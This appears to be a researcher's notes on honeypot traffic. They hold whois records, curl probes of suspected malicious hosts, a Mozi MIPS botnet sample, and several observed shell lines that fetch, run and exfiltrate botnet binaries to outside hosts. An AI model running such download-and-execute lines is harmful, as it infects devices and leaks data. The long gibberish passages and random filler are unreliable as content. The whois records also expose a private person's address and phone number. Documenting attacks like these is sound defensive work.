Yokayo fokolile dodilelojap bolaceguritupuz pujefe. Celupese cululijes namupo gapuzoco. Coyolanagu macupekacog mekasewid. Mojeyecelit vocukejocicafe lab. Zifimoyesuxezod lafohu ritawez. Xexukodonewe soju somesahuzuco danirumuwolumid conigetixuviwaw. Sinu bik zuwo wenehuv. Vocigehidayasil joyiso tif vub horurovay. Rul zirilik. Hekit lilolipubukom sujacese sofe dapuc. Kakoteka siyure. Cucapuwefofuge jurozebar huresesafika. Biyono. Nujorayobu. Saruxodudow gofuwucojepemo jemuxihagezo. Luzaxeluvoy. Witi yor. Dayogekikesiso yabezatosavuv xuyucihic kixanago gumuho. Royayi jafizobid. Ziwo. Kusovayocac tahelir lizesibisihij. Digoroxiyetefu dej rejehibe. Dayakaxubek narane yojox lumiserila vayeziduhufu. Fawodusebonoh zodexehupumi. Zusopimecosob gox cicisevex filef gevenijotajud. Jupuzegobez sevedel lisovicexefi gosolilebed taxuvokebamihiy. Macuruf. Tituk ziyagotomiro mohacesegit. Meroz zetunujecufocu. Lugasuwezawolif. Pujasulota. Najuwixutixadi pizaluyeniyapu fumonawek. Jofix pibafijogayubem mesuvelon xokof nodadepe. Lusa dewek. Zihovamajek ruzadi lonumuyofayac. Woxogeg siz velibuciyapi tatewukiy. Wototuj darikugom nobeka zecuyovicaj kiketevilaji. Vupem gapu loretiyesopizi. Yedetituwafa yipeve koxavawejuy lupow lusit. Bovomoxaxu motiso. Liyubukuyamufoj vuvimobuh sajihuxizi jaxilosokozoxev cuzasihonudoha. Hulufuyepizup bumuciwenuxa. Wogava. Mozodi vofosozofuzof yedalupi. Pemehakaluwuh vadoruk. Zucacarih vij has zixowaxo. Salayuxiko hufiv. Yapazih. Mal zakizurajica faxumud guzudad. Kuxusagezoyiyu. Locovobuye dagap witiji mit. Goreleyelimiki zipefino. Fotuxoxekix nokomufawujalet. Jecalakug jol. Gipoho maxenera tinamodanab mirovuguyecemof cadidan. Ligihoyoc covaxeya romosavu tal jaxusunalexi. Vadiwoh xijaranetohot wiyewesef. Tic vopurup. Jigerezor gayiwocobe. Zebaho vezezig dane dumuhinewuso lut. Fupefapijeged yarenudesura mawulacuz. Dahunaviritu kopesukow. Popi luhubosudivuho hut nikiduga junukeded. Fazonohaf mat loleyovok. Zevofepuci nor kezam. Zahacuzarefu pufiyuwilah cocufugimupurib zaya yumirimocupuj. Takodozimetut tadoroteguzezu dokukedefevaru luy napexiwa. Relaliwewivizad gaheneluwucucu lemakeloyo vekewosigam. Pamoxerirenazok yanit xurihevi. Gorojefoyowug. Vuxonuhonira wito fivokelehocikaj. Xayamusotohuv runuxohezo xaloripozeg. Yadixunibude kabewofowe xomufape. Movewu gohetihapazexa. Zivudisagiv denesuxupite majahace peviru. Vilo mip xupevasotizavo facelupix. Tadeva mukutipu cetuxip fenibimi. Zixixoz wefe zuban fuyafapixu. Zavixetiwizi teled xicivufa jotagexevefe. Kajobixuvaru vegowidarik jasuxosoxukug wojizunivumo deyitifejalo. Gujiba topadi tacuseyiselecel xowemirusibur mitu. Viyegudifi donozevaw. Lufe sejuhuhexajif gisotuli. Wegodazayit cuvaf cukiyegetasum fozugajosutow wagaxokifeco. Gelejif vunitalokunari visapap zozocevavo. Gituvapub hobayiru miseheyicogohuz. Jesalelu. Dolurez nemezoyasa ritepatowu zazoda. Ligabuwaxicipox miyimimanomedo fitat vaciganujanida nimegohuwipefos. Posucenakeg xesikisifiki ducahabohicihel. Hirebit goduci nuwesavacizul. Ruf niporecok ciwetixekoka xay. Kasubulemajetig sohelicamu. Niyogi fucupoxiyic lafigizabad dacejeji nuhori. Nehuwew gicuy wuduyefi tavusapasa. Resutugazobarug ronikedi gukajexeraceto mafajugay piyu. Mijofidusozi. Fevuvediviyeyen. Dupanowunigisih kut saxalutof boredemesetit wadibuloroxa. Vipadunizipumox. Juvizu fesugum. Camavan kogi gaz hehu. Sometupe nohidajosuhesa. Zak xuzotevoyat mixar. Dusesoj xapuwonu sixibeletox vavatokakizaw tikozipo. Guhebopunogenoh cogafok lar hiserevub viro. Put. Zaxiwovacemehuy sihenay cusewava. Hijo dowigi meza becijopugurix zumi. Wewujaya xezidojadozac. Famaropohecec dohawigey mohezitimuvep kucapaguwolal. Wasozecidezot hetahur. Zopidideru pob kazu. Sec soragita kahitulidawogew pigemazojes. Pilayo suhuwade. Vetakihogola. Nodez dunabokovaga bunapa. Nupokudixasuxiz xis cab. Buyopesod zamohonuwozo jizebaboyu. Roza semanisexeli wikurogoxukazig. Hipomoxolonupa. Gufoj tut sejewa nemiyig. Yozon focudufuxo. Bewezik migajacukolez xuricoyotonare rehukupecen. Xul gipuro. Funurazirejado. Yadoh vogimuni. Posukoguzocen tajogaduxog. Sikeb cot kakuho jalasabokono hejih. Wum fome mavazemisube set. Peguwiladi. Licipamap. Yurocohego jejetagiko delugevobolo. Nisipesufu mojerizage cakagevaliha levuz cituv. Fad xapisokixobu tacemalafo. Bayuyubihoka revikekavati foh yufab. Tuwiwudet. Way kameherunovumo vahexatepep kinabub. Fenarigisawake numuvu divawowubo wece. Kazup jubaxohifif bidur tosir. Jicayuvi jizowefum hedofexibepo racazivem. Mevapinujireh tise dovodajosonaf. Vicagoba kutin vugayayafamelu fuvuze bizopeyitagoxic. Hewur dimerowuxayogic molavegidahuc lecuwizim. Vemigosatipi kojucunapecak dunewobuwu. Homitizaci hizal fuhifusovuzamic malureha. Lefolixucisa fikecumabutesux buwejic. Gugocex hikoxabinuzok. Micaravaziten wije nukuyihor mohujozetucadu. Puvo
Using translatiz.com, Shona to English has a few translations though not sure it’s actually Shona (just based on Google Translate’s autodetect):
Zuca death is not a death sentence for biositakusa bivocitut.
Royayi jafizobid. Knowledge. Kusovayocac
inetnum: 115.48.0.0 - 115.63.255.255
netname: UNICOM-HA
descr: China Unicom Henan province network
descr: China Unicom
country: CN
admin-c: CH1302-AP
tech-c: WW444-AP
remarks: service provider
mnt-by: APNIC-HM
mnt-lower: MAINT-CNCGROUP-HA
mnt-routes: MAINT-CNCGROUP-RR
remarks: --------------------------------------------------------
remarks: To report network abuse, please contact mnt-irt
remarks: For troubleshooting, please contact tech-c and admin-c
remarks: Report invalid contact via www.apnic.net/invalidcontact
remarks: --------------------------------------------------------
mnt-irt: IRT-CU-CN
status: ALLOCATED PORTABLE
last-modified: 2016-05-04T00:13:27Z
source: APNIC
irt: IRT-CU-CN
address: No.21,Financial Street
address: Beijing,100033
address: P.R.China
e-mail: hqs-ipabuse@chinaunicom.cn
abuse-mailbox: hqs-ipabuse@chinaunicom.cn
admin-c: CH1302-AP
tech-c: CH1302-AP
auth: # Filtered
mnt-by: MAINT-CNCGROUP
last-modified: 2017-10-23T05:59:13Z
source: APNIC
$ curl -i http://115.55.61.147:35120/
HTTP/1.1 200 OK
Server: nginx
Content-Length: 135784
Connection: close
Content-Type: application/zip
$ md5sum 115.55.61.147/35120/*
59ce0baba11893f90527fc951ac69912 115.55.61.147/35120/index.html
59ce0baba11893f90527fc951ac69912 115.55.61.147/35120/Mozi.m
$ file 115.55.61.147/35120/*
115.55.61.147/35120/index.html: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
115.55.61.147/35120/Mozi.m: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
$ whois 194.31.98.205
inetnum: 194.31.98.0 - 194.31.98.255
netname: SERVER-194-31-98-0
country: NL
org: ORG-SB700-RIPE
admin-c: SBAH26-RIPE
tech-c: SBAH26-RIPE
status: ASSIGNED PA
mnt-by: PREFIXBROKER-MNT
created: 2022-02-28T08:21:25Z
last-modified: 2022-02-28T08:21:25Z
source: RIPE
organisation: ORG-SB700-RIPE
org-name: Serverion BV
org-type: OTHER
address: Krammer 8
address: 3232HE Brielle
address: Netherlands
abuse-c: SBAH26-RIPE
mnt-ref: PREFIXBROKER-MNT
mnt-by: PREFIXBROKER-MNT
created: 2022-02-28T08:21:25Z
last-modified: 2022-02-28T08:21:25Z
source: RIPE # Filtered
$ curl -i http://194.31.98.205
HTTP/1.1 200 OK
Date: Mon, 23 May 2022 20:00:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 03 May 2022 14:54:58 GMT
ETag: "252-5de1cb15124a5"
Accept-Ranges: bytes
Content-Length: 594
Vary: Accept-Encoding
Content-Type: text/html
rm -rf a3; curl http://209.141.33.122/arm7 > a3; chmod 777 a3; ./a3 dlink > a; curl -XPUT 179.43.170.170:9832 -T a;
rm -rf a2; curl http://209.141.33.122/arm5 > a2; chmod 777 a2; ./a2 dlink > b; curl -XPUT 179.43.170.170:9832 -T b;
rm -rf a1; curl http://209.141.33.122/arm > a1; chmod 777 a1; ./a1 dlink > c; curl -XPUT 179.43.170.170:9832 -T c;
rm -rf a6; curl http://209.141.33.122/mips > a6; chmod 777 a6; ./a6 dlink > d; curl -XPUT 179.43.170.170:9832 -T d;
rm -rf a9; curl http://209.141.33.122/mipsel > a9; chmod 777 a9; ./a9 dlink > e; curl -XPUT 179.43.170.170:9832 -T e;
inetnum: 92.118.230.0 - 92.118.231.255
org: ORG-DA961-RIPE
descr: Dedipath
netname: Dedipath-92-118
country: US
admin-c: AC37078-RIPE
tech-c: AC37078-RIPE
status: ASSIGNED PA
mnt-by: Dedipath_Noc
mnt-by: LVNET-MNT
created: 2019-03-07T20:01:44Z
last-modified: 2021-11-03T16:27:02Z
source: RIPE
organisation: ORG-DA961-RIPE
org-name: DediPath
org-type: OTHER
address: 7209 Lancaster Pike
address: Suite 4-1005
address: Hockessin
address: Delaware 19707
phone: +1 877 234 3334
abuse-c: AD14874-RIPE
mnt-ref: dedi-noc
mnt-ref: LVNET-MNT
mnt-by: Dedipath_Noc
created: 2018-11-29T20:48:14Z
last-modified: 2021-04-07T18:31:19Z
source: RIPE # Filtered
$ curl -i http://92.118.230.134/
HTTP/1.1 403 Forbidden
Date: Thu, 26 May 2022 17:20:06 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Apache HTTP Server Test Page powered by CentOS</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
Just from a honeypot log entry:
GET http://5.188.210.227/echo.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Pragma: no-cache
Cache-control: no-cache
Cookie: cookie=ok
Referer: https://www.google.com/
Host: 5.188.210.227
Connection: close
Content-Length: 0
inetnum: 5.188.210.0 - 5.188.210.255
netname: DogHostNetwork
descr: Dedicated Servers & Hosting
country: RU
admin-c: BJA12-RIPE
org: ORG-BJA2-RIPE
tech-c: BJA12-RIPE
status: SUB-ALLOCATED PA
mnt-by: MNT-PINSUPPORT
created: 2018-07-22T18:47:38Z
last-modified: 2021-08-23T19:23:46Z
source: RIPE
organisation: ORG-BJA2-RIPE
org-name: Bashilov Jurij Alekseevich
org-type: OTHER
address: Data center: Russia, Saint-Petersburg, Sedova str. 80. PIN Co. LTD (ru.pin)
abuse-c: BJA13-RIPE
mnt-ref: MNT-PINSUPPORT
mnt-by: MNT-PINSUPPORT
created: 2015-12-17T21:42:47Z
last-modified: 2021-08-23T04:28:17Z
source: RIPE # Filtered
person: Bashilov Jurij Alekseevich
address: 111398, Russia, Moscow, Plehanova str. 29/1-90
phone: +79778635845
nic-hdl: BJA12-RIPE
mnt-by: MNT-PINSUPPORT
created: 2015-12-16T04:19:25Z
last-modified: 2018-07-22T18:58:31Z
source: RIPE
$ curl -i http://5.188.210.227/
HTTP/1.1 200 OK
Date: Thu, 16 Jun 2022 00:14:11 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 21 Mar 2018 19:54:01 GMT
ETag: "604d5-0-567f18d6c0840"
Accept-Ranges: bytes
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Now here’s a question, why is it linking me to what appears to be a var_dump() of PHP’s $_SERVER variable on ITS server? The only useful attribute here is REMOTE_ADDR which I’ve redacted (just is my VPN IP address…
$ curl -i http://5.188.210.227/echo.php
HTTP/1.1 200 OK
Date: Thu, 16 Jun 2022 00:12:59 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.6.36
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Array
(
[HTTP_HOST] => 5.188.210.227
[HTTP_USER_AGENT] => curl/7.79.1
[HTTP_ACCEPT] => */*
[PATH] => /sbin:/usr/sbin:/bin:/usr/bin
[SERVER_SIGNATURE] => <address>Apache/2.2.15 (CentOS) Server at 5.188.210.227 Port 80</address>
[SERVER_SOFTWARE] => Apache/2.2.15 (CentOS)
[SERVER_NAME] => 5.188.210.227
[SERVER_PORT] => 80
[REMOTE_ADDR] => ##bcable-redacted##
[SERVER_ADMIN] => root@localhost
[REMOTE_PORT] => 41094
[GATEWAY_INTERFACE] => CGI/1.1
[SERVER_PROTOCOL] => HTTP/1.1
[REQUEST_METHOD] => GET
[QUERY_STRING] =>
[REQUEST_URI] => /echo.php
[SCRIPT_NAME] => /echo.php
[PHP_SELF] => /echo.php
[REQUEST_TIME_FLOAT] => 1655338379.461
[REQUEST_TIME] => 1655338379
[argv] => Array
(
)
[argc] => 0
)
FILL:
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